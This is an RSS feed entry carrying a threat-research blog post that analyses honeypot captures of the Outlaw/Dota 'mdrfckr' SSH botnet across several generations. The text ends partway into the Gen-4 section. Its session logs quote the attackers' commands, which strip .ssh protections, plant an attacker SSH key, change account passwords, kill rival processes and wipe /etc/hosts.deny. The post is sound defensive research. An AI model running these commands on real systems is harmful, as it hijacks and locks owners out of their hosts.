<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Demodex</title>
    <description>The latest articles on DEV Community by Demodex (@demodex).</description>
    <link>https://dev.to/demodex</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4155400%2Ff1f25d78-9f37-41e9-b17a-600ddf25f980.png</url>
      <title>DEV Community: Demodex</title>
      <link>https://dev.to/demodex</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/demodex"/>
    <language>en</language>
    <item>
      <title>mdrfckr: The Outlaw/Dota Botnet Changes Its SSH Fingerprint Again</title>
      <dc:creator>Demodex</dc:creator>
      <pubDate>Thu, 01 Oct 2026 17:40:26 +0000</pubDate>
      <link>https://dev.to/demodex/mdrfckr-the-outlawdota-botnet-changes-its-ssh-fingerprint-again-c89</link>
      <guid>https://dev.to/demodex/mdrfckr-the-outlawdota-botnet-changes-its-ssh-fingerprint-again-c89</guid>
      <description>&lt;p&gt;On September 27, my honeypot recorded a new generation of the Outlaw group's cryptomining botnet, featuring a modified client cryptographic proposal configuration and a significant regression.&lt;/p&gt;

&lt;p&gt;On 2026-05-15, researcher Gokul Prema Thangavel published a guest post on the SANS Internet Storm Center describing the third generation of the mdrfckr botnet, not a new campaign by the Outlaw cybercrime organization: a new SSH fingerprint with an updated client SSH banner, &lt;code&gt;SSH-2.0-libssh_0.11.1&lt;/code&gt;. The third generation, hassh &lt;code&gt;03a80b21afa810682a776a7d42e5e6fb&lt;/code&gt;, used compromise and persistence techniques identical to those of the previous one.&lt;/p&gt;

&lt;p&gt;Recently, my Cowrie honeypot recorded yet another generation of the same organization's botnet over the period from &lt;code&gt;2026-09-25&lt;/code&gt; to &lt;code&gt;2026-09-30&lt;/code&gt;: three sessions with an average duration of approximately 4.6 seconds from IP address 36.134.69.15 (ASN AS56044).&lt;/p&gt;

&lt;h2&gt;
  
  
  What Is Already Known About the Outlaw/Dota Organization's mdrfckr Campaigns
&lt;/h2&gt;

&lt;p&gt;The campaign, known by the &lt;code&gt;mdrfckr&lt;/code&gt; comment string in the public SSH key, belongs to the Outlaw botnet, also known as Dota, and has been documented by researchers since at least 2018. The botnet spreads via SSH brute-force and removes artifacts of competing botnets from compromised hosts.&lt;/p&gt;

&lt;p&gt;In October-November 2022, port22 recorded &lt;strong&gt;12,913 unique IPs from 152 countries&lt;/strong&gt; associated with mdrfckr. The client in use was &lt;code&gt;libssh-0.6.3&lt;/code&gt; with hassh &lt;code&gt;51cba57125523ce4b9db67714a90bf6e&lt;/code&gt;. The bot performed system reconnaissance, changed the root password, and added an SSH key to &lt;code&gt;authorized_keys&lt;/code&gt;. On December 7, 2022, the botnet switched to &lt;code&gt;libssh_0.9.5/0.9.6&lt;/code&gt; with hassh &lt;code&gt;f555226df1963d1d3c09daf865abdc9a&lt;/code&gt;. &lt;strong&gt;Approximately 30,000 IPs&lt;/strong&gt; were recorded, along with commands to remove the protection from &lt;code&gt;.ssh&lt;/code&gt; and to reinfect the host. The bot also deleted the files and processes of competitors. The SSH key remained unchanged. In April 2026, SANS ISC recorded a new client, &lt;code&gt;libssh_0.11.1&lt;/code&gt;, with hassh &lt;code&gt;03a80b21afa810682a776a7d42e5e6fb&lt;/code&gt;. On a single sensor, &lt;strong&gt;24 IPs and 3,473 SSH records over 8 days&lt;/strong&gt; were discovered, April 14-21. The TTPs remained nearly unchanged: reconnaissance, key injection, password change, and competitor cleanup.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;hassh&lt;/th&gt;
&lt;th&gt;client.version&lt;/th&gt;
&lt;th&gt;First documented&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Gen-1&lt;/td&gt;
&lt;td&gt;&lt;code&gt;51cba5712..&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;libssh 0.6.0/0.6.3&lt;/td&gt;
&lt;td&gt;10.2022&lt;/td&gt;
&lt;td&gt;port22&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen-2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;f555226df..&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;libssh 0.9.5/0.9.6&lt;/td&gt;
&lt;td&gt;12.2022&lt;/td&gt;
&lt;td&gt;port22&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen-3&lt;/td&gt;
&lt;td&gt;&lt;code&gt;03a80b21a..&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;libssh 0.11.1&lt;/td&gt;
&lt;td&gt;04.2026&lt;/td&gt;
&lt;td&gt;SANS ISC&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Analysis of Data from My Own Observation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Gen-2
&lt;/h3&gt;

&lt;p&gt;In total, my honeypot recorded 618 sessions from 163 unique IP addresses in various countries around the world.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fl5valz7ezl3qmsaoe6c8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fl5valz7ezl3qmsaoe6c8.png" alt="Gen-2" width="657" height="287"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The most frequently used SSH authentication credential combinations were: &lt;code&gt;345gs5662d34/345gs5662d34&lt;/code&gt;, &lt;code&gt;root/3245gs5662d34&lt;/code&gt;, &lt;code&gt;test/3245gs5662d34&lt;/code&gt;, and &lt;code&gt;user/3245gs5662d34&lt;/code&gt;. It is worth noting that &lt;strong&gt;Cowrie selectively records and identifies the login and password during an SSH session&lt;/strong&gt;, so the data presented does not necessarily reflect the complete set of credentials used.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SSH client banner:&lt;/strong&gt; researchers recorded the use of two client banner versions: &lt;code&gt;SSH-2.0-libssh_0.9.5&lt;/code&gt; and &lt;code&gt;SSH-2.0-libssh_0.9.6&lt;/code&gt;. Within my own observation, only one version was recorded: &lt;code&gt;SSH-2.0-libssh_0.9.6&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;During the Gen-2 activity period, &lt;strong&gt;42 waves&lt;/strong&gt; were recorded. The intervals between waves, measured from the start of one wave to the start of the next, are characterized by the following values:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Metric&lt;/td&gt;
&lt;td&gt;Value&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Median interval&lt;/td&gt;
&lt;td&gt;131 min (~2.2 h)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mean interval&lt;/td&gt;
&lt;td&gt;128 min&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Minimum interval&lt;/td&gt;
&lt;td&gt;52 min&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Maximum interval&lt;/td&gt;
&lt;td&gt;260 min (~4.3 h)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The intervals are mostly concentrated around the ~2-2.5 hour mark, with no pronounced chaotic outliers; the waves were observed around the clock, with no daily pauses. This periodicity may indicate the use of a centralized scheduling mechanism rather than random activity from distributed nodes. Thus, the recorded data indicates that Gen-2 generates a new wave approximately every 2-2.5 hours.&lt;/p&gt;

&lt;p&gt;The waves themselves are short-lived: from a few minutes to approximately 2 hours, with a median of 17 minutes. Each wave covers between 1 and 49 sessions from different IP addresses, with a median of 10 sessions. A characteristic example was observed during the first waves on September 27:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;07:35  9 sessions   →  +91 min  →  09:06  24 sessions
10:52  9 sessions   →  +70 min  →  12:02  12 sessions
14:46 12 sessions   →  +119 min →  16:45  32 sessions
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The examples above demonstrate an irregular number of sessions within individual waves while the intervals between them remain relatively stable.&lt;/p&gt;

&lt;p&gt;Gen-2 sessions fall into three distinct categories: 407 sessions (65.86%) with no commands at all, 203 sessions (32.85%) with key injection only, and 8 sessions (1.29%) with the full persistence chain. One representative session from each category is shown below, all with hassh &lt;code&gt;f555226df1963d1d3c09daf865abdc9a&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The first and largest category: the bot connects, makes a single login attempt, and initiates a session teardown; the entire session lasts 1.6 seconds. No commands are executed after successful authentication. The bot is most likely checking the validity of the login/password pair and marking the host as accessible.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;--- session 1bb450cbecb8 ---
23:31:29  CONNECT 218.90.138.78:2879
23:31:29  VER    SSH-2.0-libssh_0.9.6
23:31:29  KEX    hassh:f555226df1963d1d3c09daf865abdc9a
23:31:30  LOGIN  root/3245gs5662d34
23:31:30  CLOSED duration 1.6 s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The second-largest category is a two-command chain, after which the bot tears down the session:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The first command &lt;strong&gt;changes to the home directory&lt;/strong&gt; (&lt;code&gt;cd ~&lt;/code&gt;) and &lt;strong&gt;removes the immutable and append-only protection attributes&lt;/strong&gt; from the &lt;code&gt;~/.ssh&lt;/code&gt; folder using the &lt;strong&gt;&lt;code&gt;chattr&lt;/code&gt;&lt;/strong&gt; and &lt;strong&gt;&lt;code&gt;lockr&lt;/code&gt;&lt;/strong&gt; utilities, fully opening it for editing or deletion.&lt;/li&gt;
&lt;li&gt;It &lt;strong&gt;deletes all of the user's current SSH keys&lt;/strong&gt;, creates a new empty &lt;code&gt;.ssh&lt;/code&gt; folder, and &lt;strong&gt;writes its own malicious key&lt;/strong&gt; there for remote access, then resets and &lt;strong&gt;completely closes access to the &lt;code&gt;.ssh&lt;/code&gt; folder for other users&lt;/strong&gt;, leaving permissions for the owner only, and returns to the home directory.&lt;/li&gt;
&lt;li&gt;The bot initiates a session teardown.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;--- session 1b5a00b74de8 ---
15:28:36  CONNECT 106.12.127.112:59978
15:28:36  VER    SSH-2.0-libssh_0.9.6
15:28:37  KEX    hassh:f555226df1963d1d3c09daf865abdc9a
15:28:38  LOGIN  root/cesar
15:28:38  CMD    cd ~; chattr -ia .ssh; lockr -ia .ssh
15:28:38  CMD!   lockr -ia .ssh  (command not found)
15:28:39  CMD    cd ~ &amp;amp;&amp;amp; rm -rf .ssh &amp;amp;&amp;amp; mkdir .ssh &amp;amp;&amp;amp; echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"&amp;gt;&amp;gt;.ssh/authorized_keys &amp;amp;&amp;amp; chmod -R go= ~/.ssh &amp;amp;&amp;amp; cd ~    [KEY]
15:28:40  FILE↓  /root/.ssh/authorized_keys  sha256:a8460f446be54041… (duplicate)
15:28:46  CLOSED duration 10.3 s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The third category has the full persistence chain.&lt;/p&gt;

&lt;p&gt;This category demonstrates &lt;strong&gt;the complete sequence of actions following successful authentication&lt;/strong&gt;. Unlike the 2022 port22 report, where reconnaissance preceded key injection and all actions were performed within a single flow in approximately 15.8 seconds, the sessions under examination show a split into &lt;strong&gt;two phases&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;In the first phase, the SSH key injection is performed automatically, identical to the second category. This is followed by &lt;strong&gt;a pause of approximately 28 seconds&lt;/strong&gt;, after which the second phase begins: execution of the password change and system reconnaissance commands.&lt;/p&gt;

&lt;p&gt;A distinctive feature of this scenario is &lt;strong&gt;a stable interval of approximately one second between consecutive second-phase commands&lt;/strong&gt;. This behavior was observed in all recorded sessions of this type, except for root. &lt;strong&gt;Based on the available data, it is impossible to definitively determine the cause of the 28-second delay and the regular one-second interval between commands.&lt;/strong&gt; This may be related to the bot's own operating logic, a mechanism for triggering the next stage of the attack, the specifics of its interaction with the compromised environment, or an imitation of human actions; however, additional observations are needed to confirm any of these versions.&lt;/p&gt;

&lt;p&gt;During the second phase, the account password is changed. Since the session runs as an ordinary user, &lt;code&gt;developer&lt;/code&gt;, the bot uses the &lt;code&gt;passwd&lt;/code&gt; utility to change its password. First, a command with &lt;code&gt;echo -e&lt;/code&gt; is executed, and one second later, a retry without &lt;code&gt;-e&lt;/code&gt;. This sequence can be viewed as a compatibility mechanism for different shell implementations, since they may handle escape sequences differently. The new password, &lt;code&gt;l7SXVORC7FF7&lt;/code&gt;, differs from the passwords recorded in other full sessions: &lt;code&gt;zSJ5LnyXoswg&lt;/code&gt; for &lt;code&gt;ubuntu&lt;/code&gt;, &lt;code&gt;YLM1p2XmQuOO&lt;/code&gt; for &lt;code&gt;ansible&lt;/code&gt;, &lt;code&gt;6NKne7bl9wIH&lt;/code&gt; for &lt;code&gt;jp&lt;/code&gt;, and &lt;code&gt;JDCVmAclzepc&lt;/code&gt; for &lt;code&gt;root&lt;/code&gt;. This indicates the use of a &lt;strong&gt;unique password for each session&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;System reconnaissance.&lt;/strong&gt; During this phase, the bot executes &lt;strong&gt;14 commands&lt;/strong&gt; aimed at collecting information about the hardware and software environment: the processor via &lt;code&gt;/proc/cpuinfo&lt;/code&gt; and &lt;code&gt;lscpu&lt;/code&gt;, memory via &lt;code&gt;free&lt;/code&gt;, running processes via &lt;code&gt;top&lt;/code&gt;, architecture via &lt;code&gt;uname&lt;/code&gt;, active users via &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;whoami&lt;/code&gt;, cron jobs via &lt;code&gt;crontab&lt;/code&gt;, and disk space via &lt;code&gt;df&lt;/code&gt;. The first of these is executed one second before the password change. A check of the location and parameters of the &lt;code&gt;ls&lt;/code&gt; utility is also performed. The bulk of this set matches the commands recorded in previous research, including in 2022.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;--- session 1a6a4e1cfda3 ---
11:12:12  CONNECT 140.249.189.35:60082
11:12:14  VER    SSH-2.0-libssh_0.9.6
11:12:14  KEX    hassh:f555226df1963d1d3c09daf865abdc9a
11:12:15  LOGIN  developer/12345678
11:12:16  CMD    cd ~; chattr -ia .ssh; lockr -ia .ssh
11:12:16  CMD!   lockr -ia .ssh  (command not found)
11:12:17  CMD    cd ~ &amp;amp;&amp;amp; rm -rf .ssh &amp;amp;&amp;amp; mkdir .ssh &amp;amp;&amp;amp; echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"&amp;gt;&amp;gt;.ssh/authorized_keys &amp;amp;&amp;amp; chmod -R go= ~/.ssh &amp;amp;&amp;amp; cd ~    [KEY]
11:12:17  FILE↓  /home/developer/.ssh/authorized_keys  sha256:a8460f446be54041… (duplicate)
11:12:45  CMD    cat /proc/cpuinfo | grep name | wc -l    [RECON]
11:12:46  CMD    echo -e "12345678\nl7SXVORC7FF7\nl7SXVORC7FF7"|passwd|bash
11:12:47  CMD    echo "12345678\nl7SXVORC7FF7\nl7SXVORC7FF7\n"|passwd
11:12:48  CMD    cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'    [RECON]
11:12:49  CMD    free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'    [RECON]
11:12:50  CMD    ls -lh $(which ls)    [RECON]
11:12:51  CMD    crontab -l    [RECON]
11:12:52  CMD    w
11:12:53  CMD    uname -m    [RECON]
11:12:54  CMD    cat /proc/cpuinfo | grep model | grep name | wc -l    [RECON]
11:12:55  CMD    top    [RECON]
11:12:56  CMD    uname    [RECON]
11:12:57  CMD    uname -a    [RECON]
11:12:58  CMD    whoami    [RECON]
11:12:59  CMD    lscpu | grep Model    [RECON]
11:13:00  CMD    df -h | head -n 2 | awk 'FNR == 2 {print $2;}'    [RECON]
11:13:00  CLOSED duration 47.9 s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I would also like to draw attention separately to the differences in the command execution scenario depending on account privileges. In the session where the bot gained access to the system under the &lt;code&gt;root&lt;/code&gt; account, the command sequence differed from sessions with ordinary users. In particular, the &lt;code&gt;root&lt;/code&gt; password was changed directly using &lt;code&gt;chpasswd&lt;/code&gt;, whereas in the &lt;code&gt;developer&lt;/code&gt; user session the &lt;code&gt;passwd&lt;/code&gt; utility was used, with the current and new passwords passed through &lt;code&gt;stdin&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;In addition, &lt;strong&gt;the root session contained an extra stage of cleanup against potential competitors&lt;/strong&gt;. Immediately after the password change, the bot executed commands to delete &lt;code&gt;/tmp/secure.sh&lt;/code&gt; and &lt;code&gt;/tmp/auth.sh&lt;/code&gt;, terminate the corresponding processes, and clear &lt;code&gt;/etc/hosts.deny&lt;/code&gt;. This stage is absent in the &lt;code&gt;developer&lt;/code&gt; user session under examination.&lt;/p&gt;

&lt;p&gt;After that, the bot proceeded with standard system reconnaissance: gathering information about the processor, memory, cron jobs, active users, system architecture, running processes, and available disk space.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It is also worth noting the difference in the session's time structure.&lt;/strong&gt; In the previously reviewed ordinary-user scenario, a pause of approximately &lt;strong&gt;28 seconds&lt;/strong&gt; was observed after the SSH key injection, after which the bot moved on to executing reconnaissance commands at intervals of about one second. In the root session under review, this delay is &lt;strong&gt;absent&lt;/strong&gt;: after the key is installed, the password change, competitor cleanup, and reconnaissance commands are executed almost continuously, over the next few seconds.&lt;/p&gt;

&lt;p&gt;This may indicate that &lt;strong&gt;the timing sequence of actions depends on the session context, in particular on the privileges of the compromised account&lt;/strong&gt;. At the same time, it is impossible to definitively establish the reason for the absence of the 28-second delay on the basis of a single root session.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;--- session 405749332e0e ---
02:05:39  CONNECT 46.6.127.33:8069
02:05:39  VER    SSH-2.0-libssh_0.9.6
02:05:39  KEX    hassh:f555226df1963d1d3c09daf865abdc9a
02:05:39  LOGIN  root/3245gs5662d34
02:05:40  CMD    cd ~; chattr -ia .ssh; lockr -ia .ssh
02:05:40  CMD!   lockr -ia .ssh  (command not found)
02:05:40  CMD    cd ~ &amp;amp;&amp;amp; rm -rf .ssh &amp;amp;&amp;amp; mkdir .ssh &amp;amp;&amp;amp; echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"&amp;gt;&amp;gt;.ssh/authorized_keys &amp;amp;&amp;amp; chmod -R go= ~/.ssh &amp;amp;&amp;amp; cd ~    [KEY]
02:05:40  FILE↓  /root/.ssh/authorized_keys  sha256:a8460f446be54041… (duplicate)
02:05:40  CMD    cat /proc/cpuinfo | grep name | wc -l    [RECON]
02:05:40  CMD    echo "root:JDCVmAclzepc"|chpasswd|bash    [PASS]
02:05:40  PASSWD password change for root  [PASS]
02:05:40  CMD    rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo &amp;gt; /etc/hosts.deny; pkill -9 sleep;    [KILL] [WIPE]
02:05:41  FILE↓  /etc/hosts.deny  sha256:01ba4719c80b6fe9…
02:05:41  CMD    cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'    [RECON]
02:05:41  CMD    free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'    [RECON]
02:05:41  CMD    ls -lh $(which ls)    [RECON]
02:05:41  CMD    crontab -l    [RECON]
02:05:41  CMD    w
02:05:42  CMD    uname -m    [RECON]
02:05:42  CMD    cat /proc/cpuinfo | grep model | grep name | wc -l    [RECON]
02:05:42  CMD    top    [RECON]
02:05:42  CMD    uname    [RECON]
02:05:42  CMD    uname -a    [RECON]
02:05:43  CMD    whoami    [RECON]
02:05:43  CMD    lscpu | grep Model    [RECON]
02:05:43  CMD    df -h | head -n 2 | awk 'FNR == 2 {print $2;}'    [RECON]
02:05:43  CLOSED duration 3.8 s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Gen-3
&lt;/h3&gt;

&lt;p&gt;A total of 107 sessions from 27 unique IP addresses of this botnet generation were recorded.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F34gmx2ekvv7jfkp6neja.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F34gmx2ekvv7jfkp6neja.png" alt="Gen-3" width="640" height="288"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The most frequently used SSH authentication credential combinations were: &lt;code&gt;345gs5662d34/345gs5662d34&lt;/code&gt;, &lt;code&gt;root/3245gs5662d34&lt;/code&gt;, &lt;code&gt;root/Admin!@123&lt;/code&gt;, and &lt;code&gt;root/metalica&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SSH client banner:&lt;/strong&gt; unlike Gen-2, Gen-3 uses a newer client banner version, &lt;code&gt;SSH-2.0-libssh_0.11.1&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Gen-3 exhibits the same wave structure, but at a noticeably slower pace:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Metric&lt;/td&gt;
&lt;td&gt;Gen-2&lt;/td&gt;
&lt;td&gt;Gen-3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Waves&lt;/td&gt;
&lt;td&gt;42&lt;/td&gt;
&lt;td&gt;21&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Median interval&lt;/td&gt;
&lt;td&gt;131 min (~2.2 h)&lt;/td&gt;
&lt;td&gt;224 min (~3.7 h)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Maximum interval&lt;/td&gt;
&lt;td&gt;260 min (~4.3 h)&lt;/td&gt;
&lt;td&gt;823 min (~13.7 h)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The median interval between Gen-3 waves is approximately &lt;strong&gt;&lt;em&gt;1.7 times&lt;/em&gt;&lt;/strong&gt; longer than that of Gen-2, 224 versus 131 minutes. Thus, the recorded Gen-3 activity occurs approximately 1.7 times less frequently.&lt;/p&gt;

&lt;p&gt;Gen-3 sessions also fall clearly into two categories: 70 sessions (65.4%) contain no commands, while 37 sessions (34.6%) show key injection. Overall, the command sequence and execution pattern fully correspond to the first and second categories defined for Gen-2.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;--- session 096a323227a8 ---
06:05:07  CONNECT 111.238.174.6:34630
06:05:07  VER    SSH-2.0-libssh_0.11.1
06:05:07  KEX    hassh:03a80b21afa810682a776a7d42e5e6fb
06:05:09  LOGIN  rena/rena
06:05:09  CMD    cd ~; chattr -ia .ssh; lockr -ia .ssh
06:05:09  CMD!   lockr -ia .ssh  (command not found)
06:05:10  CMD    cd ~ &amp;amp;&amp;amp; rm -rf .ssh &amp;amp;&amp;amp; mkdir .ssh &amp;amp;&amp;amp; echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"&amp;gt;&amp;gt;.ssh/authorized_keys &amp;amp;&amp;amp; chmod -R go= ~/.ssh &amp;amp;&amp;amp; cd ~    [KEY]
06:05:10  FILE↓  /home/rena/.ssh/authorized_keys  sha256:a8460f446be54041… (duplicate)
06:05:14  CLOSED duration 6.7 s

--- session 0ee1ff35c971 ---
11:13:53  CONNECT 200.165.70.141:41461
11:13:53  VER    SSH-2.0-libssh_0.11.1
11:13:53  KEX    hassh:03a80b21afa810682a776a7d42e5e6fb
11:13:54  LOGIN  root/3245gs5662d34
11:13:54  CLOSED duration 1.3 s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Gen-3 demonstrates preservation of the previous generation's core behavioral pattern, albeit at a lower intensity.&lt;/p&gt;

&lt;h3&gt;
  
  
  Gen-4
&lt;/h3&gt;

&lt;p&gt;Finally, we come to the most important finding of this short observation period: the fourth recorded generation of the mdrfckr botnet, Gen-4. Its detection makes it possible to trace the further evolution of the threat and compare it with previous versions.&lt;/p&gt;

&lt;p&gt;My honeypot recorded Gen-4 on September 27 in a short 9-second window, from 12:07:11 to 12:07:20. During this time, three sessions occurred from a single IP address, 36.134.69.15, China Mobile, China. At the behavioral level, the sessions are practically indistinguishable from the already known Gen-3 sessions: the same SSH client banner &lt;code&gt;SSH-2.0-libssh_0.11.1&lt;/code&gt;, the same dictionary-based credential brute-forcing, and an identical sequence of actions after a successful login.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
